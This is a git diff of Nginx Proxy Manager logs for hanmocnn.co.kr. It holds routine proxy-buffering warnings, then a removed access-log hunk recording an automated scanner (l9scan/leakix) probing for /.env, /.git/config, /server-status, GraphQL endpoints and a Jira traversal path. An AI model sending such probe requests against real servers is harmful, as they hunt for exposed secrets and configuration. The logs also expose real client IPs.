"http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/" +2026/02/19 02:57:14 [warn] 991#991: *107957 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/16/0000022167 while reading upstream, client: 222.239.104.26, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/" +2026/02/19 02:57:14 [warn] 985#985: *107963 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/16/0000022168 while reading upstream, client: 222.239.104.26, server: hanmocnn.co.kr, request: "GET /assets/images/instrument.png HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/instrument.png", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/" +2026/02/19 02:57:14 [warn] 991#991: *107956 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/16/0000022169 while reading upstream, client: 222.239.104.26, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/" +2026/02/19 03:04:45 [warn] 991#991: *107982 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/17/0000022170 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:04:45 [warn] 991#991: *107982 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/17/0000022171 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:07:21 [warn] 990#990: *108011 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/17/0000022172 while reading upstream, client: 222.239.104.30, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/" +2026/02/19 03:07:21 [warn] 992#992: *108015 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/17/0000022173 while reading upstream, client: 222.239.104.30, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/" +2026/02/19 03:07:21 [warn] 992#992: *108020 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/17/0000022174 while reading upstream, client: 222.239.104.30, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/" +2026/02/19 03:07:21 [warn] 992#992: *108021 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/17/0000022175 while reading upstream, client: 222.239.104.30, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/" +2026/02/19 03:07:21 [warn] 990#990: *108016 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/17/0000022176 while reading upstream, client: 222.239.104.30, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/" +2026/02/19 03:07:21 [warn] 992#992: *108022 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/17/0000022177 while reading upstream, client: 222.239.104.30, server: hanmocnn.co.kr, request: "GET /assets/images/instrument.png HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/instrument.png", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/" +2026/02/19 03:07:21 [warn] 992#992: *108015 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/17/0000022178 while reading upstream, client: 222.239.104.30, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/" +2026/02/19 03:09:37 [warn] 990#990: *108034 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/17/0000022179 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:09:37 [warn] 990#990: *108034 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/18/0000022180 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:09:37 [warn] 990#990: *108034 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/18/0000022181 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:14:36 [warn] 990#990: *108067 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/18/0000022182 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:14:36 [warn] 990#990: *108067 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/18/0000022183 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:14:36 [warn] 990#990: *108067 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/18/0000022184 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:14:36 [warn] 990#990: *108067 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/18/0000022185 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:18:32 [warn] 990#990: *108091 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/18/0000022186 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:26:50 [warn] 992#992: *108118 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/18/0000022187 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:26:50 [warn] 992#992: *108118 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/18/0000022188 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:26:50 [warn] 992#992: *108118 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/18/0000022189 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:28:26 [warn] 992#992: *108133 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/19/0000022190 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:28:26 [warn] 992#992: *108133 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/19/0000022191 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:34:31 [warn] 992#992: *108157 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/19/0000022192 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:34:31 [warn] 992#992: *108157 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/19/0000022193 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:34:31 [warn] 992#992: *108157 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/19/0000022194 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:44:57 [warn] 992#992: *108175 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/19/0000022195 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:44:57 [warn] 992#992: *108175 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/19/0000022196 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:44:57 [warn] 992#992: *108175 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/19/0000022197 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:49:35 [warn] 992#992: *108236 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/19/0000022199 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:56:42 [warn] 985#985: *108267 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/20/0000022200 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:56:42 [warn] 985#985: *108267 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/20/0000022201 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 03:56:42 [warn] 985#985: *108267 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/20/0000022202 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 04:03:19 [warn] 985#985: *108294 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/20/0000022203 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 04:03:19 [warn] 985#985: *108294 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/20/0000022204 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 04:03:19 [warn] 985#985: *108294 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/20/0000022205 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 04:07:41 [warn] 985#985: *108325 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/20/0000022206 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 04:07:41 [warn] 985#985: *108325 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/20/0000022207 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 04:07:41 [warn] 985#985: *108325 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/20/0000022208 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 04:11:23 [warn] 985#985: *108339 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/20/0000022209 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/19 04:11:23 [warn] 985#985: *108339 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/21/0000022210 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" diff --git a/npm/data/logs/proxy-host-2_access.log b/npm/data/logs/proxy-host-2_access.log index 5cef119..00506aa 100644 --- a/npm/data/logs/proxy-host-2_access.log +++ b/npm/data/logs/proxy-host-2_access.log @@ -1,798 +1,13 @@ -[14/Feb/2026:22:59:23 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:22:59:23 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[14/Feb/2026:22:59:49 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:22:59:49 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[14/Feb/2026:23:00:27 +0000] - - 301 - HEAD http asset.hanmocnn.co.kr "/" [Client 195.123.244.84] [Length 0] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0" "-" -[14/Feb/2026:23:00:28 +0000] - 502 502 - HEAD https asset.hanmocnn.co.kr "/" [Client 195.123.244.84] [Length 0] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0" "http://asset.hanmocnn.co.kr" -[14/Feb/2026:23:00:30 +0000] - - 400 - - https asset.hanmocnn.co.kr "-" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to ] "-" "-" -[14/Feb/2026:23:00:30 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:31 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:31 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/server" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:32 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:00:32 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[14/Feb/2026:23:00:32 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/server" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:32 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/server-status" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:33 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/server-status" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:34 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/about" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:35 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/login.action" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:35 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/about" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:36 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/v2/_catalog" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:36 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/login.action" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:36 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/.DS_Store" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:37 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/v2/_catalog" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:37 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/.env" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:37 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.DS_Store" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:38 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.env" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:39 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:40 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:41 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/.git/config" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:42 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.git/config" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:42 +0000] - 502 502 - POST https asset.hanmocnn.co.kr "/graphql" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:43 +0000] - 502 502 - POST https asset.hanmocnn.co.kr "/api" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:43 +0000] - 502 502 - POST https asset.hanmocnn.co.kr "/api/graphql" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:43 +0000] - 502 502 - POST https asset.hanmocnn.co.kr "/graphql/api" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:44 +0000] - 502 502 - POST https asset.hanmocnn.co.kr "/api/gql" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:44 +0000] - - 301 - POST http asset.hanmocnn.co.kr "/graphql" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:44 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:44 +0000] - - 301 - POST http asset.hanmocnn.co.kr "/api" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:44 +0000] - - 301 - POST http asset.hanmocnn.co.kr "/api/graphql" [Client 